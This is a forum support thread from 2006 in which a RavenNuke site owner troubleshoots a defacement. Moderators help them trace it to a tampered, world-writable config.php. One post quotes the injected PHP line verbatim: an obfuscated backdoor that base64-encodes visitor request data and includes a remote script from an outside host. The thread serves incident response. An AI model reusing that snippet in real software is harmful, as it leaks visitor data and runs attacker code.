| Author |
Message |
gbhughs
Regular
Joined: Sep 11, 2004
Posts: 84
|
 Posted:
Mon May 01, 2006 4:26 pm |
|
Somebody hacked my site today and somehow changed the title for every side block, news block, and link titles.
The only 2 blocks that are not effected by this are the Admin block (title is fine) and the Waiting Content block (title is fine).
The Nuke Sentinel tables were screwed up.
The table for nuke_nsnst_tracked_ips did not exist and it said that the table had crashed. So I fixed that table, and I still have the problem.
Here was the error I received for this table
| Quote: | Error
SQL query: Edit
SHOW INDEX FROM `nuke_nsnst_tracked_ips` ;
MySQL said: Documentation
#1016 - Can't open file: 'nuke_nsnst_tracked_ips.MYI' (errno: 145)
|
Click Here take a look and I need suggestions on how to solve this issue.
BTW:
I am using 76v2.02.....
Nuke sentinel v1.1.1(I think, came with the pkg?)
Thanks in advance |
| |
|
|
|
gbhughs
|
| Posted:
Mon May 01, 2006 4:39 pm |
|
Answer to below post from:
[ Only registered users can see links on this board! Get registered or login! ]
| Stang5_0 wrote: | FYI
I am now having the same issue when lookin with myphpadmin, and I have made no changes recently. Can you please PM me the IP if you have one or post it here so we can compare notes?
Thanks,
Stang |
The ips I had were:
| Quote: | 24.196.99.131
63.163.102
69.128.88.22
65.28.206.168 |
|
| |
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
| Posted:
Mon May 01, 2006 5:37 pm |
|
Are you sure you are using Ravenuke? I didn't see any copyright or credit messages. |
Last edited by Guardian2003 on Mon May 01, 2006 5:45 pm; edited 1 time in total |
|
|
|
gbhughs
|
| Posted:
Mon May 01, 2006 5:39 pm |
|
I'm sure....
I've discussed the copyright message with Raven |
| |
|
|
|
|
Guardian2003
|
| Posted:
Mon May 01, 2006 5:48 pm |
|
I see you are already getting support in another thread, did you want to continue with tha thread or keep this new one? |
| |
|
|
|
|
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY
|
| Posted:
Mon May 01, 2006 5:49 pm |
|
Well, I've tried in both threads but the Sentinel version you listed is not even close to what comes with RN 2.02. To enable folks to help you here you really need to step back and tell us when and where you downloaded the distribution you are using, what you did to install it and when, and take a look at Sentinel in the admin screen and tell us what the version is.
It sounds like you loaded a Post Nuke (PN?) users table over the top of a RN users table? I can't say how feasible that is but did you load any other tables the same way? |
| |
|
|
|
gbhughs
|
| Posted:
Mon May 01, 2006 5:49 pm |
|
I saw that I posted that one in the wrong area and would like to use this one cause it is where it shoulda been to begin with. |
| |
|
|
|
|
gbhughs
|
| Posted:
Mon May 01, 2006 5:53 pm |
|
I downloaded this oh about 2 months ago.
I'm sorry think I posted the wrong version.
Can I find the version number in here nuke_nsnst_config?
And if so this is what I came up with 2.4.2pl3.
BTW: Bear with me this is kinda new to me. |
| |
|
|
|
|
Guardian2003
|
| Posted:
Mon May 01, 2006 5:53 pm |
|
OK.
As fkelly pointed out, we now need to establish exactly how you installed RN, if it was a fresh install or old data was transfered etc. |
| |
|
|
|
|
gbhughs
|
| Posted:
Mon May 01, 2006 5:55 pm |
|
| fkelly wrote: | | It sounds like you loaded a Post Nuke (PN?) users table over the top of a RN users table? I can't say how feasible that is but did you load any other tables the same way? |
I guess, if that is the technical term for this procedure.
I can say yes I added my PN users to this database, but I havent had any problems with this as of yet and that has been 2 months ago.
One more table I loaded over would be the stories table from and old PHP site (v 6.5 I think)
Other than that nothing else......
Fresh Install
Then I did the other 2 things mentioned above and that was it. |
| |
|
|
|
|
gbhughs
|
| Posted:
Mon May 01, 2006 7:01 pm |
|
Well I have found the problem.
Somehow, someone was able to tamper with my config.php file.
I uploaded the original and now everything is working.
Now my question is how the h-e-double-L hockey sticks do I prevent this from happening again? |
| |
|
|
|
|
Guardian2003
|
| Posted:
Mon May 01, 2006 7:30 pm |
|
What did you find in your config.php that had been changed?
Was it the database connection details? |
| |
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6432
|
| Posted:
Mon May 01, 2006 8:39 pm |
|
|
|
|
|
gbhughs
|
| Posted:
Mon May 01, 2006 8:52 pm |
|
They added this line at the bottom of the file:
| Quote: | error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>
|
|
| |
|
|
|
|
Guardian2003
|
| Posted:
Tue May 02, 2006 7:03 am |
|
What was the chmod set to for that file?
I am just trying to determine whether someone managed to edit (write to) the file directly as part of some cross site scripting attack.
ADMINS, do we want to remove that code and and put it in [ Only registered users can see links on this board! Get registered or login! ] for further analysis? |
| |
|
|
|
|
fkelly
|
| Posted:
Tue May 02, 2006 7:18 am |
|
As Kguske pointed you should probably be concerned that someone might have administrative access to your site. Assuming you are in a hosted environment you might want to go change the passwords for whatever administrative panel you use and also for any FTP accounts you've set up.
Also, if you can tell when that config.php file was changed (exploited) you might look in your logs around that time and see if there is any suspicious activity.
Your Sentinel version is fairly new though there are some updates available. Just out of curiousity what version of Forums are you using? That should show at the bottom of your forums admin screen. |
| |
|
|
|
|
gbhughs
|
| Posted:
Tue May 02, 2006 9:49 am |
|
| Guardian2003 wrote: | | What was the chmod set to for that file? |
Well in doing some research I found that the permission was set for "world writable". I have now set this permission at 644. |
| |
|
|
|
|
gbhughs
|
| Posted:
Tue May 02, 2006 9:54 am |
|
| fkelly wrote: | | As Kguske pointed you should probably be concerned that someone might have administrative access to your site. Assuming you are in a hosted environment you might want to go change the passwords for whatever administrative panel you use and also for any FTP accounts you've set up. |
I have changed all passwords like you mentioned above.
| fkelly wrote: | | Also, if you can tell when that config.php file was changed (exploited) you might look in your logs around that time and see if there is any suspicious activity. |
We are looking into this.....
| fkelly wrote: | | Your Sentinel version is fairly new though there are some updates available. Just out of curiousity what version of Forums are you using? That should show at the bottom of your forums admin screen. |
I am running phpBB 2.0.19 |
| |
|
|
|
|
Stang5_0
Hangin' Around
Joined: Oct 17, 2002
Posts: 49
Location: Phoenix, AZ
|
| Posted:
Mon May 08, 2006 9:47 am |
|
| gbhughs wrote: | Well I have found the problem.
Somehow, someone was able to tamper with my config.php file.
I uploaded the original and now everything is working.
Now my question is how the h-e-double-L hockey sticks do I prevent this from happening again? |
I wish mine were that easy. My config.php looks fine, but when I try to go into myphpadmin to look at the DB's I get this at the top:
Error
SQL query: DocumentationEdit
SELECT COUNT( * ) AS num
FROM `sg`.`nuke_nsnst_tracked_ips`
MySQL said: Documentation
#1016 - Can't open file: 'nuke_nsnst_tracked_ips.MYD'. (errno: 145)
The last table listed is nuke_nsnst_protected_ranges
I was hoping a new config.php would be the ticket, but I don't think that is true in this case since like I said, mine has not been modified. Any suggestions here guys? I am running the latest package as well from Raven.
Thanks,
Stang |
| |
|
 
 |
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
| Posted:
Tue May 09, 2006 6:04 am |
|
|
|
|
|
Stang5_0
|
| Posted:
Wed May 10, 2006 9:56 am |
|
Can that be done with phpadmin?
My friend that used to work at the ISP that helped me with this has gone to another place of work and they have yet to find a replacement so at this point, I'm kinda on my own |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
